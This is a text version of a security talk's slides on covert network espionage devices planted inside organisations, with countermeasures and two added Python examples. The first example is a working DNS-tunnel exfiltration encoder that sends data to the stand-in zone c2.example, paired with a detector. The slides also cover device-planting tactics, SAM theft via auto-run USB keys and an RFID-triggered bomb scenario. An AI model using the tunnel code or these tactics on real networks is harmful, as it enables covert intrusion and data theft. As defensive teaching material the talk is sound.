5. Warnings and Stuff
● This is academic research...the “how” not the “why”
● This is “dangerous information”...however
  – You have the right/need to know
  – I have the right/need to talk
● Oh yeah...and remember
  – Devices (in context) may be illegal...don't use
  – Activities (in context) may be illegal...don't do
6. Objectives
● Academic information exchange
● My favorite cheap 'n mean gear (network focused)
● Attacks & countermeasures
● “The nasty”
● Resources
7. Agenda
● Objectives
● Attacks
● Network Espionage Devices (NEDs)
● Gettin' Spooky with IT
● Countermeasures
8. “Waiter, my mushroom soup tastes funny”
Never underestimate the devastation of a “simple” attack
9. Attacker Goals
● Attacker wants to accomplish...
  – Gain network access via a device at victim's location
  – Attack internal/external hosts via TCP/IP
  – Attack phone/PDA/PC via Bluetooth
  – Passively gather information via sniffing
  – Establish other internal and external access
  – Impersonate services – webserver, database
  – Target a user – VIP VoIP connection
10. Attack Tools
● Typical opensource methods and tools
  – Scanning & probing
  – Sniffing
  – Exploiting
  – Covert communications, reverse crypto connections
● Multiple protocols and entry points
  – Wired LAN
  – 802.11b/g wireless
  – Bluetooth
  – RFID
11. NEDs
● My favorites
  – Linksys WRT54G
  – Linksys NSLU2
  – Nokia 770
  – Gumstix
  – PicoTux
● Plenty of others!
  – Access points, PDAs, game platforms, etc.
12. Agenda
● Objectives
● Attacks
● Network Espionage Devices (NEDs)
● Gettin' Spooky with IT
● Countermeasures
13. NED Characteristics
● Small, unobtrusive, ubiquitous, cute
● Low-cost, almost disposable
● Minimal power requirements
  – Power over Ethernet, battery, solar potential
● Multiple attack vector capability
  – Wired, wireless, Bluetooth, RFID
● Traditional forensics very difficult
  – Ephemeral filesystems running in RAM
● Try that, EnCase!
14. NED Characteristics
● Outbound reverse connections back to attacker
  – Crypto tunnels bypass firewalls, IDS/IPS
  – “Under the radar” common protocols: DNS requests, ICMP, HTTP/S are typically allowed through firewalls
  – Proxies, anonymizers, bouncing through multiple boxes
● Ported attack tools and exploits
  – ARM processor-based
  – Hardware/software limitations and trade-offs
● Dependent libraries, GUIs, etc.
● Don't expect the Nessus GUI on Linksys routers
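The reverse-connection point above is easiest to see with one concrete covert channel. The following is an added example (mine, not code from the deck or from any of the devices it lists): the attacker side of a DNS-label tunnel, the receiving side that reassembles it, and the defender-side check over query logs that the slide's “know your traffic” countermeasure implies. The zone c2.example, the sequence-prefix label layout, the `time client qtype qname` log format and every sample line are constructed for the example; the only fixed fact used is the 63-byte DNS label limit from RFC 1035.

```python
"""DNS covert channel, attacker and defender side (added example, not from
the original deck).

Assumptions, labelled here and in the comments: the attacker controls the
hypothetical zone c2.example; data rides in the first DNS label, which
RFC 1035 limits to 63 bytes; the query log format 'time client qtype qname'
and all sample data below are constructed for this example.
"""
import base64
import math
from collections import Counter, defaultdict

C2_DOMAIN = "c2.example"   # hypothetical attacker-controlled zone (assumption)
MAX_LABEL = 63             # RFC 1035 limit on one DNS label
SEQ_WIDTH = 5              # "NNNN-" sequence prefix so chunks can be reordered


def encode_exfil(data, seq=0):
    """Attacker side: split data into queries <seq>-<base32>.c2.example.

    Lowercase base32 is used so the names survive case-insensitive resolvers.
    """
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    chunk_len = MAX_LABEL - SEQ_WIDTH
    names = []
    for i in range(0, len(b32), chunk_len):
        n = seq + i // chunk_len
        names.append("%04d-%s.%s" % (n, b32[i:i + chunk_len], C2_DOMAIN))
    return names


def decode_exfil(names):
    """Attacker's authoritative server: reassemble the payload from the queries,
    tolerating out-of-order arrival (resolvers do not preserve order)."""
    chunks = {}
    for name in names:
        label = name.split(".")[0]
        seq, chunk = label.split("-", 1)
        chunks[int(seq)] = chunk
    b32 = "".join(chunks[k] for k in sorted(chunks)).upper()
    b32 += "=" * (-len(b32) % 8)       # restore the base32 padding stripped above
    return base64.b32decode(b32)


def shannon_entropy(s):
    """Bits per character: base32 text runs near 4-5, ordinary hostnames near 2-3."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registered_domain(qname):
    # Simplification: last two labels. Real code should consult the public suffix list.
    return ".".join(qname.rstrip(".").split(".")[-2:])


def detect_dns_tunnels(log_lines, min_queries=3, min_label_len=25, min_entropy=3.5):
    """Defender side: flag (client, domain) pairs whose first labels are numerous,
    long and high-entropy. Each line is 'time client qtype qname' (constructed format).
    Returns {(client, domain): stats} for the flagged pairs only."""
    labels_by_pair = defaultdict(list)
    for line in log_lines:
        parts = line.split()
        if len(parts) < 4:
            continue                    # skip malformed lines rather than crash
        client, qname = parts[1], parts[3]
        labels_by_pair[(client, registered_domain(qname))].append(qname.split(".")[0])
    flagged = {}
    for pair, labels in labels_by_pair.items():
        mean_len = sum(len(l) for l in labels) / len(labels)
        entropy = shannon_entropy("".join(labels))   # pooled, so a short tail chunk does not dilute it
        if len(labels) >= min_queries and mean_len >= min_label_len and entropy >= min_entropy:
            flagged[pair] = {"queries": len(labels),
                             "mean_label_len": round(mean_len, 1),
                             "entropy": round(entropy, 2)}
    return flagged


# Constructed sample data: a fake credential file (not real data) and a mixed query log.
PAYLOAD = (b"root:x:0:0:root:/root:/bin/sh\n"
           b"admin:x:1000:1000:admin:/home/admin:/bin/sh\n"
           b"wpa_psk=correct-horse-battery-staple\n")
BENIGN = ["www.example.com", "mail.example.org", "cdn-static.example.net",
          "www.example.com", "time.example.org"]


def build_sample_log():
    lines = ["2006-08-04T10:00:%02d 10.0.0.5 A %s" % (i, q) for i, q in enumerate(BENIGN)]
    lines += ["2006-08-04T10:01:%02d 10.0.0.7 A %s" % (i, q)
              for i, q in enumerate(encode_exfil(PAYLOAD))]
    return lines


if __name__ == "__main__":
    queries = encode_exfil(PAYLOAD)
    print("%d queries, payload round-trips: %s" % (len(queries), decode_exfil(queries) == PAYLOAD))
    for pair, stats in detect_dns_tunnels(build_sample_log()).items():
        print("tunnel suspect:", pair, stats)
```

The detector only needs the recursive resolver's query log, which is exactly the vantage point a firewall that “allows DNS” does not give you; the thresholds are heuristics and long-labelled CDN names will need whitelisting in practice.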
15. NED Characteristics
● Stripped-down Linux
● BusyBox shell
● SSH, HTTP/S management
● Features like VPN tunnels, mesh networking
● On-the-fly software install as “packages”
  – DNS, Apache, Asterisk
  – Attack tools and exploits
  – Powerful scripting languages: Python, Ruby
16. Linksys WRT54G
● Cheap, cute, heavily “hacked” and tweaked
● Secure with default Linksys firmware?
  – Ubiquitous = the “new Windows”
  – Very likely unpublished exploits in the wild
● Opensource alternatives to Linksys firmware
  – OpenWRT
    ● Package system
  – Sveasoft
    ● Mesh networking
● Un-leashing the WRT54G....
17. FairuzaUS for Linksys
● FairuzaUS: www.hackerpimps.com
● Command line interface over SSH
  – Treo 650 SSH into FairuzaUS into compromised Windows box
18. Upcoming Linksys
● EVDO & Wifi = WOW!
● Linux-based
● This will become popular
● Potential for abuse is big
19. Nokia 770
● Basics
  – Debian-based Linux PDA
  – Slow CPU, low RAM
  – 802.11b & Bluetooth
  – Touchscreen keyboard
● Software & commercial attack platform development
  – Immunity SILICA (Dave Aitel)
    http://immunitysec.com/products-silica.shtml
  – HD Moore doing work on this platform (Metasploit)
● Maemo project and security tools packaged
  – Tcpdump, Nmap, Dsniff, Kismet, Bluetooth audit
20. Linksys NSLU2 “Slug”
● US $75
● Heavy OpenSource support
  – Unslung, Openslug, DebianSlug
● USB storage
● Bluetooth dongles
● Asterisk, webcam, MP3 stream
● Try it if you're looking for a weekend geek project
● I'm looking into this as a testing platform
21. Gumstix
● Ultra-small computers ($120 +)
● Expandable “snap in” boards
  – CF storage and 802.11b wireless
  – Single and dual Ethernet with PoE
● MITM hardware device with dual Ethernet
  – Bluetooth
  – USB, serial, PS/2 connectors
  – Used in BlueSniper, UltraSwarm
  – Developer CDs and environment
22. PicoTux
● Picotux 100 and 112 (US $100 +)
  – World's smallest Linux computer
  – 35mm×19mm×19mm (size of an RJ45 connector)
  – Power over Ethernet
  – Telnet and HTTP server
  – Developer CDs and environment
● Attacks
  – Plenum off a Cisco CAT switch
  – “Serial to ethernet connector”
23. Other Gear
● KeyKatcher
  – PS/2 and new USB version
● New “U3” USB key technology
  – Auto-run apps, installs, pull SAM on-the-fly, etc.
● EVDO USB key
● “Executive Gift USB” - Swiss Army USB/Knife
● Infected RFID tags
  – Infects reader, which then infects other tags and DB
  – http://www.rfidvirus.org/papers/press_release.pdf
24. Other Gear
● Linux phones
  – Customizable
  – Bluetooth, Wifi, cameras, etc.
● Qtopia
  – Security people “discussing ideas”
  – Prediction: top “hacker” phone
● BlackDog
  – Linux box on USB
● Biometric auth
25. Agenda
● Objectives
● Attacks
● Network Espionage Devices (NEDs)
● Gettin' Spooky with IT
● Countermeasures
26. Spooky: Device Enclosures
● Free water cooler offer ;)
  – Potential for power source
  – Legitimate reason for physical presence...and returning
● Office décor
  – Flower safe with X-mas tree & lights...plug 'n play
● Exit sign, fire extinguisher
  – Dangerous to mess with emergency gear
● But what if extra gear shows up?
  – Wow, we have even more security now!
27. Spooky: 0wn3d Mesh Network
● Municipal networks beware!
● Build it
  – EVDO gateway for Internet
  – Drive-by/walk-by AP 0wn4g3
  – Senao AP w/ Yagi = sweeper
● Run it
  – Karma = DHCP for everybody
  – Shared crypto keys, cron jobs, remote ssh-fs mounts
● 0wn it
  – Attack everything, browser exploits on portal
28. Spooky: In-Transit “Marketing”
● Airports, train stations, bus stations, subways, etc.
  – Bluetooth spamming with “scary” message content
  – 0wn3d wifi networks & Windows Messaging
● Multiplier effect
  – Simultaneous at multiple hubs in US
  – “Scary message”
● Huge productivity costs
  – Wrong message
● Used as diversion, secondary attack, etc.
● Virus/worm type attack like this is possible
29. Of Course...
● Why not hack the marketing guy's gear instead?
  “CBS today said it is planning a marketing initiative
  that will allow mobile users with Bluetooth-enabled
  phones to download promotional clips from its new
  fall TV shows directly to their handsets at billboard
  locations in New York.
  The billboards in Grand Central station....”
● Digging a little deeper
  – kameleon-media.com
  – “Remote data loading via a GPRS or Ethernet modem that connects directly the MobiPoint® to our server.”
30. Spooky: Long-distance, the next best thing to being there
● Home-built Bluetooth/Wifi “sniper” setups
  – Bluetooth targets up to one mile
  – 802.11b targets up to...?
32. Maxing Out Current Gear
● Janus Scanner – DefCon 14
● 8 Senao hi-power cards (125-mile wifi-record card)
● Amplifier 1-watt to “keep it legal”
● Linux, Kismet, etc.
● Pelican case
● Data encrypted
● 1-button operation
● Also “BlueBag”
  – Target Bluetooth
33. Terrorism & RFID Passports
● US passports will have RFID tags
  – Each US state's drivers' licenses probably next
● RFID security weaknesses already found
● Reading tags at a distance is a documented threat
● The “Nightmare Scenario”
  – Discussed in media already
  – NED (or cell) RFID scan for passports
● Connected to explosive device
● Detonate X number in range
34. Countermeasures
● Know the risks and threats
● Know your network devices and traffic
● User education, buy-in, ownership of the problem
● Policy and “best practices”
● Planned response vs. “Uh oh...”
  – Calling the cavalry (specialists, Johnny Law)
● Proactive measures
  – Honeypots, honeynets, Bluetooth honeypot
  – Yet to see an RFID honeypot (sell to Wal-Mart?)
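“Know your network devices and traffic” is the countermeasure that actually catches a planted NED, so here is what it looks like as two concrete checks. This is an added example (mine, not the deck's and not any vendor's tooling): the first compares a switch MAC-address-table / DHCP dump against a device baseline and flags unregistered MACs and known MACs that turn up on the wrong port (an inline box on a desk drop, a consumer AP on an office port), the second flags a source that sweeps many service ports across several hosts in flow records, which is also the “why is my refrigerator scanning my network” case from the next slide. The baseline, both record formats and all sample lines are constructed for the example; the OUI prefixes are illustrative vendor hints only and must be checked against the IEEE OUI registry before being relied on.

```python
"""Knowing your network devices and traffic: two checks a defender can run
from existing switch/DHCP and flow data (added example, not from the deck).

Assumptions, labelled here and in comments: the record formats, the device
baseline, the OUI hints and all sample lines are constructed for this example;
the OUI prefixes are illustrative and must be verified against the IEEE
registry before use.
"""
from collections import defaultdict

# Illustrative OUI prefix -> vendor hint (assumption; verify against the IEEE OUI list).
OUI_HINTS = {
    "00:14:bf": "Cisco-Linksys",
    "00:0c:41": "Cisco-Linksys",
    "00:15:c9": "Gumstix",
}

# Constructed baseline: MAC -> (expected switch port, description).
BASELINE = {
    "00:1e:ab:10:20:30": ("Gi1/0/1", "finance-pc-01"),
    "00:1e:ab:10:20:31": ("Gi1/0/2", "finance-pc-02"),
    "00:1e:ab:10:20:32": ("Gi1/0/4", "finance-printer"),
}

# Constructed observations from a MAC-address-table / DHCP dump: 'port mac ip'.
OBSERVED = [
    "Gi1/0/1 00:1e:ab:10:20:30 10.0.1.20",
    "Gi1/0/2 00:1e:ab:10:20:31 10.0.1.21",
    "Gi1/0/3 00:1e:ab:10:20:32 10.0.1.22",   # the printer, but on the wrong port
    "Gi1/0/7 00:14:bf:9a:bb:cc 10.0.1.77",   # consumer AP nobody registered
    "Gi1/0/9 00:15:c9:01:02:03 10.0.1.99",   # small ARM board nobody registered
]


def find_unknown_devices(observed, baseline, oui_hints):
    """Return one finding per device that is absent from the baseline, or that
    shows up on a port other than the one recorded for it."""
    findings = []
    for line in observed:
        port, mac, ip = line.split()
        mac = mac.lower()
        if mac not in baseline:
            vendor = oui_hints.get(mac[:8], "unknown vendor")
            findings.append({"mac": mac, "ip": ip, "port": port,
                             "reason": "unknown", "vendor": vendor})
        elif baseline[mac][0] != port:
            findings.append({"mac": mac, "ip": ip, "port": port,
                             "reason": "moved", "expected_port": baseline[mac][0]})
    return findings


# Constructed flow records: 'src dst dport proto'. Normal traffic plus one host
# sweeping a handful of service ports across several servers.
FLOWS = [
    "10.0.1.20 10.0.2.10 443 tcp",
    "10.0.1.20 10.0.2.11 25 tcp",
    "10.0.1.21 10.0.2.10 443 tcp",
    "10.0.1.22 10.0.2.12 9100 tcp",
] + ["10.0.1.99 10.0.2.%d %d tcp" % (host, port)
     for host in (1, 2, 3) for port in (21, 22, 23, 80, 443, 445, 3389)]


def find_scanners(flows, min_pairs=12, min_ports=5):
    """Flag sources that touch many distinct (dst, port) pairs across many
    distinct ports; a printer talking to one port on one server never qualifies."""
    pairs = defaultdict(set)
    for line in flows:
        src, dst, dport, _proto = line.split()
        pairs[src].add((dst, int(dport)))
    scanners = {}
    for src, targets in pairs.items():
        ports = {p for _, p in targets}
        hosts = {h for h, _ in targets}
        if len(targets) >= min_pairs and len(ports) >= min_ports:
            scanners[src] = {"hosts": len(hosts), "ports": len(ports), "pairs": len(targets)}
    return scanners


if __name__ == "__main__":
    for finding in find_unknown_devices(OBSERVED, BASELINE, OUI_HINTS):
        print("device:", finding)
    for src, stats in find_scanners(FLOWS).items():
        print("scanner:", src, stats)
```

Both checks work from data a switch and a flow exporter already produce, which matters against a device whose own filesystem lives in RAM: the network is where the evidence persists. A MAC can of course be spoofed to match the baseline, so the port-mismatch and scan checks are what catch the device that borrows a legitimate address.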
35. Looking Forward & Other Stuff
● More devices with network access
  – “Why is my refrigerator scanning my network?”
● Mobile devices will be targeted
● VoIP and the new-style phone tapping agenda
  – VoIP phones as room taps
  – Capture VoIP traffic
● Same old story
  – New technology, adoption, poor security, etc.
36. Thanks!
● Questions?
● Feel free to contact me at shawnmer@io.com